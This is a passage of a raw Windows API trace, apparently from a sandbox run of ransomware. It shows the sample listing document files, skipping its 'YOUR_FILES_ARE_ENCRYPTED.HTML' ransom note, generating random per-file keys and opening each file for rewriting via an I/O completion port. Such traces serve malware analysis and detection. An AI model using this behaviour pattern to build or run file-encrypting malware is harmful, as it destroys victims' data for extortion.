[0166.710] SystemFunction036 (in: RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) returned 1 [0166.710] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\FIMjs52RRmmi4D7W\\DI5i-e 02AN.xls" (normalized: "c:\\users\\5alr3u30d3\\documents\\cxn1g6nnkt\\fimjs52rrmmi4d7w\\di5i-e 02an.xls"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x598 [0166.710] GetFileSizeEx (in: hFile=0x598, lpFileSize=0x4ebd810 | out: lpFileSize=0x4ebd810*=85243) returned 1 [0166.710] GetProcessHeap () returned 0x270000 [0166.710] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7690008 [0166.711] wsprintfW (in: param_1=0x4ebd72a, param_2="%02X" | out: param_1="16") returned 2 [0166.711] wsprintfW (in: param_1=0x4ebd72e, param_2="%02X" | out: param_1="E6") returned 2 [0166.711] wsprintfW (in: param_1=0x4ebd732, param_2="%02X" | out: param_1="56") returned 2 [0166.711] wsprintfW (in: param_1=0x4ebd736, param_2="%02X" | out: param_1="A9") returned 2 [0166.711] wsprintfW (in: param_1=0x4ebd73a, param_2="%02X" | out: param_1="82") returned 2 [0166.712] wsprintfW (in: param_1=0x4ebd73e, param_2="%02X" | out: param_1="6E") returned 2 [0166.712] wsprintfW (in: param_1=0x4ebd742, param_2="%02X" | out: param_1="14") returned 2 [0166.712] wsprintfW (in: param_1=0x4ebd746, param_2="%02X" | out: param_1="76") returned 2 [0166.712] wsprintfW (in: param_1=0x4ebd74a, param_2="%02X" | out: param_1="3C") returned 2 [0166.712] wsprintfW (in: param_1=0x4ebd74e, param_2="%02X" | out: param_1="82") returned 2 [0166.712] wsprintfW (in: param_1=0x4ebd752, param_2="%02X" | out: param_1="A0") returned 2 [0166.712] wsprintfW (in: param_1=0x4ebd756, param_2="%02X" | out: param_1="7A") returned 2 [0166.712] wsprintfW (in: param_1=0x4ebd75a, param_2="%02X" | out: param_1="FE") returned 2 [0166.712] wsprintfW (in: param_1=0x4ebd75e, param_2="%02X" | out: param_1="54") returned 2 [0166.712] wsprintfW (in: param_1=0x4ebd762, param_2="%02X" | out: param_1="A9") returned 2 [0166.712] wsprintfW (in: param_1=0x4ebd766, param_2="%02X" | out: param_1="40") returned 2 [0166.712] wsprintfW (in: param_1=0x4ebd76a, param_2="%02X" | out: param_1="8E") returned 2 [0166.712] wsprintfW (in: param_1=0x4ebd76e, param_2="%02X" | out: param_1="E0") returned 2 [0166.712] wsprintfW (in: param_1=0x4ebd772, param_2="%02X" | out: param_1="18") returned 2 [0166.712] wsprintfW (in: param_1=0x4ebd776, param_2="%02X" | out: param_1="88") returned 2 [0166.712] wsprintfW (in: param_1=0x4ebd77a, param_2="%02X" | out: param_1="70") returned 2 [0166.712] wsprintfW (in: param_1=0x4ebd77e, param_2="%02X" | out: param_1="6B") returned 2 [0166.712] wsprintfW (in: param_1=0x4ebd782, param_2="%02X" | out: param_1="8E") returned 2 [0166.712] wsprintfW (in: param_1=0x4ebd786, param_2="%02X" | out: param_1="48") returned 2 [0166.712] wsprintfW (in: param_1=0x4ebd78a, param_2="%02X" | out: param_1="78") returned 2 [0166.712] wsprintfW (in: param_1=0x4ebd78e, param_2="%02X" | out: param_1="4A") returned 2 [0166.712] wsprintfW (in: param_1=0x4ebd792, param_2="%02X" | out: param_1="D3") returned 2 [0166.712] wsprintfW (in: param_1=0x4ebd796, param_2="%02X" | out: param_1="16") returned 2 [0166.713] wsprintfW (in: param_1=0x4ebd79a, param_2="%02X" | out: param_1="3B") returned 2 [0166.713] wsprintfW (in: param_1=0x4ebd79e, param_2="%02X" | out: param_1="58") returned 2 [0166.713] wsprintfW (in: param_1=0x4ebd7a2, param_2="%02X" | out: param_1="32") returned 2 [0166.713] wsprintfW (in: param_1=0x4ebd7a6, param_2="%02X" | out: param_1="66") returned 2 [0166.713] lstrcpyW (in: lpString1=0x76a00bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\FIMjs52RRmmi4D7W\\DI5i-e 02AN.xls" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\FIMjs52RRmmi4D7W\\DI5i-e 02AN.xls") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\FIMjs52RRmmi4D7W\\DI5i-e 02AN.xls" [0166.713] CreateIoCompletionPort (FileHandle=0x598, ExistingCompletionPort=0x3a0, CompletionKey=0x7690008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0166.714] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7690008, lpOverlapped=0x7690008) returned 1 [0166.724] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x545cdca0, ftCreationTime.dwHighDateTime=0x1d7d997, ftLastAccessTime.dwLowDateTime=0xa6789d0, ftLastAccessTime.dwHighDateTime=0x1d7dc24, ftLastWriteTime.dwLowDateTime=0xa6789d0, ftLastWriteTime.dwHighDateTime=0x1d7dc24, nFileSizeHigh=0x0, nFileSizeLow=0x6983, dwReserved0=0xff2a5d2b, dwReserved1=0xffffffff, cFileName="IE5ugm.pdf", cAlternateFileName="")) returned 1 [0166.724] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\FIMjs52RRmmi4D7W\\IE5ugm.pdf") returned 72 [0166.724] lstrcmpW (lpString1="IE5ugm.pdf", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0166.724] PathFindExtensionW (pszPath="IE5ugm.pdf") returned=".pdf" [0166.724] lstrlenW (lpString=".pdf") returned 4 [0166.724] PathFindExtensionW (pszPath="IE5ugm.pdf") returned=".pdf" [0166.724] SystemFunction036 (in: RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) returned 1 [0166.724] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\FIMjs52RRmmi4D7W\\IE5ugm.pdf" (normalized: "c:\\users\\5alr3u30d3\\documents\\cxn1g6nnkt\\fimjs52rrmmi4d7w\\ie5ugm.pdf"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x598 [0166.725] GetFileSizeEx (in: hFile=0x598, lpFileSize=0x4ebd810 | out: lpFileSize=0x4ebd810*=27011) returned 1 [0166.725] GetProcessHeap () returned 0x270000 [0166.725] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7690008 [0166.726] wsprintfW (in: param_1=0x4ebd72a, param_2="%02X" | out: param_1="7A") returned 2 [0166.726] wsprintfW (in: param_1=0x4ebd72e, param_2="%02X" | out: param_1="36") returned 2 [0166.726] wsprintfW (in: param_1=0x4ebd732, param_2="%02X" | out: param_1="0C") returned 2 [0166.726] wsprintfW (in: param_1=0x4ebd736, param_2="%02X" | out: param_1="43") returned 2 [0166.726] wsprintfW (in: param_1=0x4ebd73a, param_2="%02X" | out: param_1="AE") returned 2 [0166.726] wsprintfW (in: param_1=0x4ebd73e, param_2="%02X" | out: param_1="DD") returned 2 [0166.726] wsprintfW (in: param_1=0x4ebd742, param_2="%02X" | out: param_1="75") returned 2 [0166.726] wsprintfW (in: param_1=0x4ebd746, param_2="%02X" | out: param_1="6D") returned 2 [0166.726] wsprintfW (in: param_1=0x4ebd74a, param_2="%02X" | out: param_1="2D") returned 2 [0166.726] wsprintfW (in: param_1=0x4ebd74e, param_2="%02X" | out: param_1="2D") returned 2 [0166.726] wsprintfW (in: param_1=0x4ebd752, param_2="%02X" | out: param_1="3A") returned 2 [0166.726] wsprintfW (in: param_1=0x4ebd756, param_2="%02X" | out: param_1="CE") returned 2 [0166.726] wsprintfW (in: param_1=0x4ebd75a, param_2="%02X" | out: param_1="34") returned 2 [0166.726] wsprintfW (in: param_1=0x4ebd75e, param_2="%02X" | out: param_1="3B") returned 2 [0166.726] wsprintfW (in: param_1=0x4ebd762, param_2="%02X" | out: param_1="E9") returned 2 [0166.726] wsprintfW (in: param_1=0x4ebd766, param_2="%02X" | out: param_1="26") returned 2 [0166.726] wsprintfW (in: param_1=0x4ebd76a, param_2="%02X" | out: param_1="B9") returned 2 [0166.726] wsprintfW (in: param_1=0x4ebd76e, param_2="%02X" | out: param_1="9E") returned 2 [0166.726] wsprintfW (in: param_1=0x4ebd772, param_2="%02X" | out: param_1="68") returned 2 [0166.726] wsprintfW (in: param_1=0x4ebd776, param_2="%02X" | out: param_1="A9") returned 2 [0166.727] wsprintfW (in: param_1=0x4ebd77a, param_2="%02X" | out: param_1="66") returned 2 [0166.727] wsprintfW (in: param_1=0x4ebd77e, param_2="%02X" | out: param_1="CE") returned 2 [0166.727] wsprintfW (in: param_1=0x4ebd782, param_2="%02X" | out: param_1="31") returned 2 [0166.727] wsprintfW (in: param_1=0x4ebd786, param_2="%02X" | out: param_1="FF") returned 2 [0166.727] wsprintfW (in: param_1=0x4ebd78a, param_2="%02X" | out: param_1="78") returned 2 [0166.727] wsprintfW (in: param_1=0x4ebd78e, param_2="%02X" | out: param_1="F2") returned 2 [0166.727] wsprintfW (in: param_1=0x4ebd792, param_2="%02X" | out: param_1="34") returned 2 [0166.727] wsprintfW (in: param_1=0x4ebd796, param_2="%02X" | out: param_1="6D") returned 2 [0166.727] wsprintfW (in: param_1=0x4ebd79a, param_2="%02X" | out: param_1="D5") returned 2 [0166.727] wsprintfW (in: param_1=0x4ebd79e, param_2="%02X" | out: param_1="A7") returned 2 [0166.727] wsprintfW (in: param_1=0x4ebd7a2, param_2="%02X" | out: param_1="25") returned 2 [0166.727] wsprintfW (in: param_1=0x4ebd7a6, param_2="%02X" | out: param_1="73") returned 2 [0166.728] lstrcpyW (in: lpString1=0x76a00bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\FIMjs52RRmmi4D7W\\IE5ugm.pdf" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\FIMjs52RRmmi4D7W\\IE5ugm.pdf") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\FIMjs52RRmmi4D7W\\IE5ugm.pdf" [0166.728] CreateIoCompletionPort (FileHandle=0x598, ExistingCompletionPort=0x3a0, CompletionKey=0x7690008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0166.728] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7690008, lpOverlapped=0x7690008) returned 1 [0166.741] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe2155a00, ftCreationTime.dwHighDateTime=0x1d7e2bf, ftLastAccessTime.dwLowDateTime=0x4757aaa0, ftLastAccessTime.dwHighDateTime=0x1d7e5e8, ftLastWriteTime.dwLowDateTime=0x4757aaa0, ftLastWriteTime.dwHighDateTime=0x1d7e5e8, nFileSizeHigh=0x0, nFileSizeLow=0x9bd4, dwReserved0=0xff2a5d2b, dwReserved1=0xffffffff, cFileName="Jj5fVb4IcQEw.pps", cAlternateFileName="JJ5FVB~1.PPS")) returned 1 [0166.741] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\FIMjs52RRmmi4D7W\\Jj5fVb4IcQEw.pps") returned 78 [0166.741] lstrcmpW (lpString1="Jj5fVb4IcQEw.pps", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0166.741] PathFindExtensionW (pszPath="Jj5fVb4IcQEw.pps") returned=".pps" [0166.741] lstrlenW (lpString=".pps") returned 4 [0166.741] PathFindExtensionW (pszPath="Jj5fVb4IcQEw.pps") returned=".pps" [0166.741] SystemFunction036 (in: RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) returned 1 [0166.741] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\FIMjs52RRmmi4D7W\\Jj5fVb4IcQEw.pps" (normalized: "c:\\users\\5alr3u30d3\\documents\\cxn1g6nnkt\\fimjs52rrmmi4d7w\\jj5fvb4icqew.pps"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x598 [0166.742] GetFileSizeEx (in: hFile=0x598, lpFileSize=0x4ebd810 | out: lpFileSize=0x4ebd810*=39892) returned 1 [0166.742] GetProcessHeap () returned 0x270000 [0166.742] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7690008 [0166.743] wsprintfW (in: param_1=0x4ebd72a, param_2="%02X" | out: param_1="D3") returned 2 [0166.743] wsprintfW (in: param_1=0x4ebd72e, param_2="%02X" | out: param_1="A7") returned 2 [0166.743] wsprintfW (in: param_1=0x4ebd732, param_2="%02X" | out: param_1="18") returned 2 [0166.743] wsprintfW (in: param_1=0x4ebd736, param_2="%02X" | out: param_1="9E") returned 2 [0166.743] wsprintfW (in: param_1=0x4ebd73a, param_2="%02X" | out: param_1="2C") returned 2 [0166.743] wsprintfW (in: param_1=0x4ebd73e, param_2="%02X" | out: param_1="47") returned 2 [0166.743] wsprintfW (in: param_1=0x4ebd742, param_2="%02X" | out: param_1="A0") returned 2 [0166.744] wsprintfW (in: param_1=0x4ebd746, param_2="%02X" | out: param_1="C8") returned 2 [0166.744] wsprintfW (in: param_1=0x4ebd74a, param_2="%02X" | out: param_1="A4") returned 2 [0166.744] wsprintfW (in: param_1=0x4ebd74e, param_2="%02X" | out: param_1="10") returned 2 [0166.744] wsprintfW (in: param_1=0x4ebd752, param_2="%02X" | out: param_1="55") returned 2 [0166.744] wsprintfW (in: param_1=0x4ebd756, param_2="%02X" | out: param_1="4D") returned 2 [0166.744] wsprintfW (in: param_1=0x4ebd75a, param_2="%02X" | out: param_1="A9") returned 2 [0166.744] wsprintfW (in: param_1=0x4ebd75e, param_2="%02X" | out: param_1="F0") returned 2 [0166.744] wsprintfW (in: param_1=0x4ebd762, param_2="%02X" | out: param_1="43") returned 2 [0166.744] wsprintfW (in: param_1=0x4ebd766, param_2="%02X" | out: param_1="1A") returned 2 [0166.744] wsprintfW (in: param_1=0x4ebd76a, param_2="%02X" | out: param_1="B4") returned 2 [0166.744] wsprintfW (in: param_1=0x4ebd76e, param_2="%02X" | out: param_1="A6") returned 2 [0166.744] wsprintfW (in: param_1=0x4ebd772, param_2="%02X" | out: param_1="68") returned 2 [0166.744] wsprintfW (in: param_1=0x4ebd776, param_2="%02X" | out: param_1="27") returned 2 [0166.744] wsprintfW (in: param_1=0x4ebd77a, param_2="%02X" | out: param_1="FD") returned 2 [0166.744] wsprintfW (in: param_1=0x4ebd77e, param_2="%02X" | out: param_1="65") returned 2 [0166.744] wsprintfW (in: param_1=0x4ebd782, param_2="%02X" | out: param_1="84") returned 2 [0166.744] wsprintfW (in: param_1=0x4ebd786, param_2="%02X" | out: param_1="A8") returned 2 [0166.744] wsprintfW (in: param_1=0x4ebd78a, param_2="%02X" | out: param_1="4A") returned 2 [0166.744] wsprintfW (in: param_1=0x4ebd78e, param_2="%02X" | out: param_1="EF") returned 2 [0166.744] wsprintfW (in: param_1=0x4ebd792, param_2="%02X" | out: param_1="07") returned 2 [0166.744] wsprintfW (in: param_1=0x4ebd796, param_2="%02X" | out: param_1="04") returned 2 [0166.744] wsprintfW (in: param_1=0x4ebd79a, param_2="%02X" | out: param_1="92") returned 2 [0166.744] wsprintfW (in: param_1=0x4ebd79e, param_2="%02X" | out: param_1="03") returned 2 [0166.745] wsprintfW (in: param_1=0x4ebd7a2, param_2="%02X" | out: param_1="90") returned 2 [0166.745] wsprintfW (in: param_1=0x4ebd7a6, param_2="%02X" | out: param_1="41") returned 2 [0166.745] lstrcpyW (in: lpString1=0x76a00bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\FIMjs52RRmmi4D7W\\Jj5fVb4IcQEw.pps" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\FIMjs52RRmmi4D7W\\Jj5fVb4IcQEw.pps") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\FIMjs52RRmmi4D7W\\Jj5fVb4IcQEw.pps" [0166.745] CreateIoCompletionPort (FileHandle=0x598, ExistingCompletionPort=0x3a0, CompletionKey=0x7690008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0166.746] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7690008, lpOverlapped=0x7690008) returned 1 [0166.751] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb7d3a260, ftCreationTime.dwHighDateTime=0x1d7dc7a, ftLastAccessTime.dwLowDateTime=0x444b69a0, ftLastAccessTime.dwHighDateTime=0x1d7dfd5, ftLastWriteTime.dwLowDateTime=0x444b69a0, ftLastWriteTime.dwHighDateTime=0x1d7dfd5, nFileSizeHigh=0x0, nFileSizeLow=0x15958, dwReserved0=0xff2a5d2b, dwReserved1=0xffffffff, cFileName="pvCfs20yr.ods", cAlternateFileName="PVCFS2~1.ODS")) returned 1 [0166.752] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\FIMjs52RRmmi4D7W\\pvCfs20yr.ods") returned 75 [0166.755] lstrcmpW (lpString1="pvCfs20yr.ods", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0166.755] PathFindExtensionW (pszPath="pvCfs20yr.ods") returned=".ods" [0166.755] lstrlenW (lpString=".ods") returned 4 [0166.755] PathFindExtensionW (pszPath="pvCfs20yr.ods") returned=".ods" [0166.755] SystemFunction036 (in: RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) returned 1 [0166.755] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\FIMjs52RRmmi4D7W\\pvCfs20yr.ods" (normalized: "c:\\users\\5alr3u30d3\\documents\\cxn1g6nnkt\\fimjs52rrmmi4d7w\\pvcfs20yr.ods"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x598 [0166.755] GetFileSizeEx (in: hFile=0x598, lpFileSize=0x4ebd810 | out: lpFileSize=0x4ebd810*=88408) returned 1 [0166.756] GetProcessHeap () returned 0x270000 [0166.756] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7690008 [0166.756] wsprintfW (in: param_1=0x4ebd72a, param_2="%02X" | out: param_1="25") returned 2 [0166.756] wsprintfW (in: param_1=0x4ebd72e, param_2="%02X" | out: param_1="D7") returned 2 [0166.756] wsprintfW (in: param_1=0x4ebd732, param_2="%02X" | out: param_1="72") returned 2 [0166.756] wsprintfW (in: param_1=0x4ebd736, param_2="%02X" | out: param_1="F9") returned 2 [0166.756] wsprintfW (in: param_1=0x4ebd73a, param_2="%02X" | out: param_1="A5") returned 2 [0166.756] wsprintfW (in: param_1=0x4ebd73e, param_2="%02X" | out: param_1="9E") returned 2 [0166.756] wsprintfW (in: param_1=0x4ebd742, param_2="%02X" | out: param_1="93") returned 2 [0166.756] wsprintfW (in: param_1=0x4ebd746, param_2="%02X" | out: param_1="F2") returned 2 [0166.756] wsprintfW (in: param_1=0x4ebd74a, param_2="%02X" | out: param_1="13") returned 2 [0166.756] wsprintfW (in: param_1=0x4ebd74e, param_2="%02X" | out: param_1="C4") returned 2 [0166.756] wsprintfW (in: param_1=0x4ebd752, param_2="%02X" | out: param_1="F9") returned 2 [0166.756] wsprintfW (in: param_1=0x4ebd756, param_2="%02X" | out: param_1="FE") returned 2 [0166.757] wsprintfW (in: param_1=0x4ebd75a, param_2="%02X" | out: param_1="18") returned 2 [0166.757] wsprintfW (in: param_1=0x4ebd75e, param_2="%02X" | out: param_1="4F") returned 2 [0166.757] wsprintfW (in: param_1=0x4ebd762, param_2="%02X" | out: param_1="28") returned 2 [0166.757] wsprintfW (in: param_1=0x4ebd766, param_2="%02X" | out: param_1="BA") returned 2 [0166.757] wsprintfW (in: param_1=0x4ebd76a, param_2="%02X" | out: param_1="69") returned 2 [0166.757] wsprintfW (in: param_1=0x4ebd76e, param_2="%02X" | out: param_1="D1") returned 2 [0166.757] wsprintfW (in: param_1=0x4ebd772, param_2="%02X" | out: param_1="2A") returned 2 [0166.757] wsprintfW (in: param_1=0x4ebd776, param_2="%02X" | out: param_1="7B") returned 2 [0166.757] wsprintfW (in: param_1=0x4ebd77a, param_2="%02X" | out: param_1="71") returned 2 [0166.757] wsprintfW (in: param_1=0x4ebd77e, param_2="%02X" | out: param_1="61") returned 2 [0166.757] wsprintfW (in: param_1=0x4ebd782, param_2="%02X" | out: param_1="1B") returned 2 [0166.757] wsprintfW (in: param_1=0x4ebd786, param_2="%02X" | out: param_1="F8") returned 2 [0166.757] wsprintfW (in: param_1=0x4ebd78a, param_2="%02X" | out: param_1="22") returned 2 [0166.757] wsprintfW (in: param_1=0x4ebd78e, param_2="%02X" | out: param_1="83") returned 2 [0166.757] wsprintfW (in: param_1=0x4ebd792, param_2="%02X" | out: param_1="80") returned 2 [0166.757] wsprintfW (in: param_1=0x4ebd796, param_2="%02X" | out: param_1="DE") returned 2 [0166.757] wsprintfW (in: param_1=0x4ebd79a, param_2="%02X" | out: param_1="C5") returned 2 [0166.757] wsprintfW (in: param_1=0x4ebd79e, param_2="%02X" | out: param_1="17") returned 2 [0166.757] wsprintfW (in: param_1=0x4ebd7a2, param_2="%02X" | out: param_1="C4") returned 2 [0166.757] wsprintfW (in: param_1=0x4ebd7a6, param_2="%02X" | out: param_1="55") returned 2 [0166.758] lstrcpyW (in: lpString1=0x76a00bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\FIMjs52RRmmi4D7W\\pvCfs20yr.ods" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\FIMjs52RRmmi4D7W\\pvCfs20yr.ods") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\FIMjs52RRmmi4D7W\\pvCfs20yr.ods" [0166.758] CreateIoCompletionPort (FileHandle=0x598, ExistingCompletionPort=0x3a0, CompletionKey=0x7690008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0166.758] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7690008, lpOverlapped=0x7690008) returned 1 [0166.762] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe019f7d0, ftCreationTime.dwHighDateTime=0x1d7e051, ftLastAccessTime.dwLowDateTime=0x5e55a470, ftLastAccessTime.dwHighDateTime=0x1d7e13b, ftLastWriteTime.dwLowDateTime=0x5e55a470, ftLastWriteTime.dwHighDateTime=0x1d7e13b, nFileSizeHigh=0x0, nFileSizeLow=0x170e7, dwReserved0=0xff2a5d2b, dwReserved1=0xffffffff, cFileName="T95w62znp uj L6ih.pdf", cAlternateFileName="T95W62~1.PDF")) returned 1 [0166.765] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\FIMjs52RRmmi4D7W\\T95w62znp uj L6ih.pdf") returned 83 [0166.765] lstrcmpW (lpString1="T95w62znp uj L6ih.pdf", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0166.765] PathFindExtensionW (pszPath="T95w62znp uj L6ih.pdf") returned=".pdf" [0166.765] lstrlenW (lpString=".pdf") returned 4 [0166.765] PathFindExtensionW (pszPath="T95w62znp uj L6ih.pdf") returned=".pdf" [0166.765] SystemFunction036 (in: RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) returned 1 [0166.765] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\FIMjs52RRmmi4D7W\\T95w62znp uj L6ih.pdf" (normalized: "c:\\users\\5alr3u30d3\\documents\\cxn1g6nnkt\\fimjs52rrmmi4d7w\\t95w62znp uj l6ih.pdf"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x598 [0166.766] GetFileSizeEx (in: hFile=0x598, lpFileSize=0x4ebd810 | out: lpFileSize=0x4ebd810*=94439) returned 1 [0166.766] GetProcessHeap () returned 0x270000 [0166.766] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7690008 [0166.767] wsprintfW (in: param_1=0x4ebd72a, param_2="%02X" | out: param_1="3A") returned 2 [0166.767] wsprintfW (in: param_1=0x4ebd72e, param_2="%02X" | out: param_1="9A") returned 2 [0166.767] wsprintfW (in: param_1=0x4ebd732, param_2="%02X" | out: param_1="51") returned 2 [0166.767] wsprintfW (in: param_1=0x4ebd736, param_2="%02X" | out: param_1="67") returned 2 [0166.767] wsprintfW (in: param_1=0x4ebd73a, param_2="%02X" | out: param_1="57") returned 2 [0166.767] wsprintfW (in: param_1=0x4ebd73e, param_2="%02X" | out: param_1="A4") returned 2 [0166.767] wsprintfW (in: param_1=0x4ebd742, param_2="%02X" | out: param_1="77") returned 2 [0166.767] wsprintfW (in: param_1=0x4ebd746, param_2="%02X" | out: param_1="E8") returned 2 [0166.767] wsprintfW (in: param_1=0x4ebd74a, param_2="%02X" | out: param_1="49") returned 2 [0166.767] wsprintfW (in: param_1=0x4ebd74e, param_2="%02X" | out: param_1="3C") returned 2 [0166.767] wsprintfW (in: param_1=0x4ebd752, param_2="%02X" | out: param_1="1A") returned 2 [0166.767] wsprintfW (in: param_1=0x4ebd756, param_2="%02X" | out: param_1="F8") returned 2 [0166.767] wsprintfW (in: param_1=0x4ebd75a, param_2="%02X" | out: param_1="F3") returned 2 [0166.767] wsprintfW (in: param_1=0x4ebd75e, param_2="%02X" | out: param_1="52") returned 2 [0166.767] wsprintfW (in: param_1=0x4ebd762, param_2="%02X" | out: param_1="BF") returned 2 [0166.767] wsprintfW (in: param_1=0x4ebd766, param_2="%02X" | out: param_1="2A") returned 2 [0166.767] wsprintfW (in: param_1=0x4ebd76a, param_2="%02X" | out: param_1="F3") returned 2 [0166.767] wsprintfW (in: param_1=0x4ebd76e, param_2="%02X" | out: param_1="00") returned 2 [0166.767] wsprintfW (in: param_1=0x4ebd772, param_2="%02X" | out: param_1="B2") returned 2 [0166.767] wsprintfW (in: param_1=0x4ebd776, param_2="%02X" | out: param_1="39") returned 2 [0166.767] wsprintfW (in: param_1=0x4ebd77a, param_2="%02X" | out: param_1="89") returned 2 [0166.767] wsprintfW (in: param_1=0x4ebd77e, param_2="%02X" | out: param_1="AD") returned 2 [0166.767] wsprintfW (in: param_1=0x4ebd782, param_2="%02X" | out: param_1="63") returned 2 [0166.767] wsprintfW (in: param_1=0x4ebd786, param_2="%02X" | out: param_1="26") returned 2 [0166.767] wsprintfW (in: param_1=0x4ebd78a, param_2="%02X" | out: param_1="B1") returned 2 [0166.767] wsprintfW (in: param_1=0x4ebd78e, param_2="%02X" | out: param_1="F3") returned 2 [0166.767] wsprintfW (in: param_1=0x4ebd792, param_2="%02X" | out: param_1="87") returned 2 [0166.768] wsprintfW (in: param_1=0x4ebd796, param_2="%02X" | out: param_1="D7") returned 2 [0166.768] wsprintfW (in: param_1=0x4ebd79a, param_2="%02X" | out: param_1="1E") returned 2 [0166.768] wsprintfW (in: param_1=0x4ebd79e, param_2="%02X" | out: param_1="C8") returned 2 [0166.768] wsprintfW (in: param_1=0x4ebd7a2, param_2="%02X" | out: param_1="D7") returned 2 [0166.768] wsprintfW (in: param_1=0x4ebd7a6, param_2="%02X" | out: param_1="4B") returned 2 [0166.768] lstrcpyW (in: lpString1=0x76a00bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\FIMjs52RRmmi4D7W\\T95w62znp uj L6ih.pdf" | out: 